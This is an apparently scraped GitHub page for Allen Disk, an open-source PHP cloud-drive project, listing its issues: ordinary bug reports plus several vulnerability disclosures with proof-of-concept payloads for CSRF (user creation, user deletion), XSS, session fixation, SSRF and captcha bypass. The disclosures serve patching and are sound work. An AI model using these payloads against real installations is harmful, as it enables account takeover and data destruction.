s3131212 / allendisk Goto Github PK

License: MIT License

PHP 81.72% JavaScript 13.48% CSS 4.80%

allendisk's Introduction

Allen Disk

Allen Disk 是一個強大、免費、開源的雲端硬碟，有了 Allen Disk，你將可以擁有自己的網路硬碟，甚至開放註冊帳號，給大家當作免空。 Allen Disk 配有檔案加密儲存、外連檔案、線上預覽、分享資料夾等等功能，讓你輕鬆管理你的檔案或是分享給大家一起使用。 http://ad.allenchou.cc

allendisk's People

Contributors

Stargazers

Watchers

Forkers

fchypzero ioanlongjing birkhofflee danielchim nicholas3388 benny1923 koru1130 mingtsay

allendisk's Issues

CSRF Vulnerability in /admin/setting.php

/admin/setting.php

if ($_SESSION['alogin']) {
    if (isset($_GET['set']) && $_GET['set'] == 'set') {
        $db->update('setting', array('value' => $_POST['sitename']), array('name' => 'sitename'));
        $db->ExecuteSQL(sprintf("UPDATE `setting` SET `value` = '%s' WHERE `setting`.`name` = 'sitetitle';", $db->databaseLink->real_escape_string($_POST['sitetitle'])));
        $db->update('setting', array('value' => $_POST['size']), array('name' => 'size'));
        $db->update('setting', array('value' => $_POST['url']), array('name' => 'url'));
        $db->update('setting', array('value' => $_POST['total']), array('name' => 'total'));
        $db->update('setting', array('value' => $_POST['admin']), array('name' => 'admin'));
        $db->update('setting', array('value' => $_POST['subtitle']), array('name' => 'subtitle'));
...

There you see, no CSRF token, which could lead to system setting modification once the admin visits a malicious web page.

下載頁面上面出現這兩串~~

Warning: set_time_limit() has been disabled for security reasons in /home/snowdrive/public_html/downfile.php on line 10

Warning: Cannot modify header information - headers already sent by (output started at /home/snowdrive/public_html/downfile.php:10) in /home/snowdrive/public_html/downfile.php on line 31

下載頁面上面出現這兩串~~

CSRF Vulnerability in /admin/newb.php

/admin/newb.php
$username = $_POST['username'];
$email = $_POST['email'];
$password = $_POST['password'];

Obviously it does not implement a CSRF token, which makes it possible that a new user could be created once the admin visits the following web page

<form action="http://allendiskdemo.com/admin/newb.php" method="POST">
<input type=text name=username value=newuser>
<input type=text name=password value=passw0rd>
<input type=text name=email [email protected]>
</form>
<script>document.form[0].submit()</script>

SSRF Vulnerability in /remotedownload.php

/remotedownload.php

$file = @file_get_contents($_POST['file']);
$header = @get_headers($_POST['file'], 1);
if ($file !== false && stripos($header[0], '200') !== false) {

Obviously, $_POST['file'] could be within intranet ip range, eg. file=http%3A%2F%2F192.168.1.1%2Fvulnerable-router.php, thus exposing a great attack surface.

關於上傳的問題

常常租用網頁主機時，會遇到max upload size的限制問題，但是也沒辦法去更動伺服端的設定。
請問可能以後allen disk會支援續傳嗎?

目前看到這個:
https://github.com/qpwoeiru96/QUpload/blob/master/README.md
可能可以使用?

Captcha Bypass Vulnerability in /reg.php

/reg.php

if (isset($_POST[ 'name']) && isset($_POST[ 'password2']) && isset($_POST[ 'password']) && $config[ 'reg'] == 'true') {
    $username = $_POST[ 'name'];
    $email = $_POST[ 'email'];
    $password = $_POST[ 'password'];
    $password2 = $_POST[ 'password2'];
    $namecheck = $db->ExecuteSQL(sprintf("SELECT count(*) AS `count` FROM `user` WHERE `name` = '%s'", $db->SecureData($username)));
    if ($namecheck[0]['count'] > 0) {
        $err = 2;
    } elseif ($username == '') {
        $err = 0;
    } elseif ($email == '') {
        $err = 0;
    } elseif ($password == '') {
        $err = 0;
    } elseif ($password != $password2) {
        $err = 1;
    } elseif (strtolower($_POST['captcha']) != strtolower($_SESSION['captcha']['code'])) {
        $err = 4;
    } else {
        $db->insert(array('name' => $username, 'pass' => password_hash($password, PASSWORD_DEFAULT), 'email' => $email), 'user');
        $err = 3;
    }
}

As with Captcha Bypass Vulnerability in /admin/loginc.php, the following code does not check wether isset($_SESSION['captcha']['code'])==1,
} elseif (strtolower($_POST['captcha']) != strtolower($_SESSION['captcha']['code'])) {
So, in order to bypass this captcha, we could simply empty $_POST['captcha'], but make sure there is no previous GET request to /reg.php.

您好，请问是否考虑过添加多语言？

如题所述

分享資料夾時無法下載其中的檔案

如題，分享資料夾的頁面按一個檔案的下載連結，連進去之後下載得的檔案是損毀的

Cross-site Scripting (XSS)

Version：1.6

Hi, I'm in your 1.6 version open source found to download.php this page parameter value ID does not filter in the output or filter or escape the input character to cause XSS

Affected Files:

/downfile.php

Poc Payload：

http://site/downfile.php?id=%22%3E%3Csvg/onload=alert(domain)%3E%22

Resolving: Filtering encoding or escaping

Session Fixation Vulnerability in /admin/loginc.php

/admin/loginc.php

include '../config.php';
if (!session_id()) {
    session_start();
}
$res = $db->select('setting', array('name' => 'admin'));
if ($_POST['password'] == $res[0]['value'] && strtolower($_POST['captcha']) == strtolower($_SESSION['captcha']['code'])) {
    $_SESSION['alogin'] = true;
    header('Location: index.php');
} else {
    header('Location: login.php?err=1');
}

Like Session Fixation Vulnerability in /loginc.php, the system does not regenerate a new session_id after the admin successfully logged in, which could lead to admin account takeover with the help of any XSS vulnerability in the same domain.

CSRF Vulnerability in /admin/manuser.php

/admin/manuser.php

if (isset($_GET['delete'])) {
    $file_list = $db->select('file', array('owner' => $_GET['delete']));
    if (is_array($file_list)) {
        foreach ($file_list as $d) {
            @unlink(dirname(dirname(__FILE__)).'/file/'.$d['realname'].'.data');
            $db->delete('file', array('id' => $d['id']));
        }
    }
    $dir_list = $db->select('dir', array('owner' => $_GET['delete']));
    if (is_array($dir_list)) {
        foreach ($db->select('dir', array('owner' => $_GET['delete'])) as $d) {
            $db->delete('dir', array('id' => $d['id']));
        }
    }
    $db->delete('user', array('name' => $_GET['delete']));
    $alert = "<div class='alert alert-success'>刪除成功</div>";
}

Without a CSRF token, any existed user and his data could be deleted once the admin visits the following page:

<img src="http://localhost/admin/manuser.php?delete=victim" />

Captcha Bypass Vulnerability in /admin/loginc.php

/admin/loginc.php

include '../config.php';
if (!session_id()) {
    session_start();
}
$res = $db->select('setting', array('name' => 'admin'));
if ($_POST['password'] == $res[0]['value'] && strtolower($_POST['captcha']) == strtolower($_SESSION['captcha']['code'])) {
    $_SESSION['alogin'] = true;
    header('Location: index.php');
} else {
    header('Location: login.php?err=1');
}

Note that $_SESSION['captcha']['code'] is set in /captcha/simple-php-captcha.php.
To bypass the captcha verification, we simply need to empty the $_POST['captcha'], but be sure there is no previous request to /captcha/simple-php-captcha.php.

How to fix:

- if ($_POST['password'] == $res[0]['value'] && strtolower($_POST['captcha']) == strtolower($_SESSION['captcha']['code'])) {
+ if ($_POST['password'] == $res[0]['value'] && isset($_SESSION['captcha']['code']) && strtolower($_POST['captcha']) == strtolower($_SESSION['captcha']['code'])) {

大檔案下載時解密失敗

遇到比較大的檔案，雖然可以被上傳，但沒有辦法正確被解密，檔案大小小於記憶體限制，然而 PHP 只會回傳一個 0B 的空檔案

Session Fixation Vulnerability in /loginc.php

/loginc.php

if (!session_id()) {
    session_start();
}
...
...
$username = $_POST['name'];
$password = $_POST['password'];
$res = login($username, $password);
switch ($res) {
    case 0:
        echo 1;
    break;

    case 1:
        $_SESSION['login'] = true;
        $_SESSION['username'] = htmlspecialchars($username);
        $_SESSION['password'] = md5_128($password);
        echo 2;
    break;

    default:
        echo 0;
    break;
}

We can see that even after we successfully logged in, the system does not regenerate a new session_id.
Note that this Session Fixation Vulnerability could easily be exploited with the help of any XSS Vulnerability in the same domain, eg. XSS Vulnerability in /readfile.php, as there is no Http-Only flag.

<script>
document.cookie="session_name=session";
document.cookie="session=HACKED";
</script>

Once the victim logged in with the session cookie above, then the attacker could take full control of the victim's account using the same cookie.

XSS Vulnerability in /readfile.php

How to reproduce:

Upload poc.html to your disk.
poc.html
<script>alert(1)</script>
Make poc.html public.
Get the link to poc.html, eg.
http://localhost/readfile.php/poc.html?id=1966eed0e8227328b9007838f43185ff694578ad&password=7dced87b7273eb62c3832e0cc07eb857e93f083b
XSS would be triggered once user visit the link above.

Change password exists CSRF Vulnerability (any change password)

Version：1.6

I found in your version 1.6 that the change password did not produce a related token, resulting in a CSRF vulnerability

Affected Files:

setpass.php

Poc Payload Test Video：

https://drive.google.com/file/d/0ByrwRfdtgouyUDdKZzBfbE01TG8/view?usp=sharing

Patch Results：

https://drive.google.com/file/d/0ByrwRfdtgouydmlYWnpabm14WHM/view?usp=sharing

但SQL回傳空查詢結果

Env:
IIS 8.5
MySQL 5.6.22

資料夾可以移進自己的子節點

資料夾可以移進自己的子節點
造成"隱夾"問題(?)